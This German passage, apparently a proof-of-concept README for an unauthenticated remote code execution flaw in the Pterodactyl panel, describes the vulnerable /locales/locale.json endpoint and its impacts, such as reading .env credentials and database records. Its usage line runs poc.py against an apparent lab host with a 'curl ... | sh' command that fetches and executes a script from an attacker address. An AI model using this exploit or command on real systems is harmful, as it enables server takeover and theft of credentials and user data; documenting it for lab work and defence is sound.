
Der Fehler ermöglicht es einem Angreifer, beliebige Systembefehle auf dem Server auszuführen, der das Pterodactyl-Panel hostet, ohne vorherige Authentifizierung.
Auswirkungen
Durch die Verwendung von /locales/locale.json mit den Abfrageparametern locale und namespace kann ein Angreifer beliebigen Code ausführen, ohne authentifiziert zu sein.
Mit der Fähigkeit, beliebigen Code auszuführen, kann diese Schwachstelle auf unendlich viele Arten ausgenutzt werden. Sie könnte genutzt werden, um Zugriff auf den Server des Panels zu erhalten, Anmeldedaten aus der Konfiguration des Panels (.env oder anderweitig) auszulesen, sensible Informationen aus der Datenbank zu extrahieren (wie Benutzerdetails [Benutzername, E-Mail, Vor- und Nachname, gehashtes Passwort, IP-Adressen usw.]), auf Dateien von Servern zuzugreifen, die vom Panel verwaltet werden, usw.
Verwendung
python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh'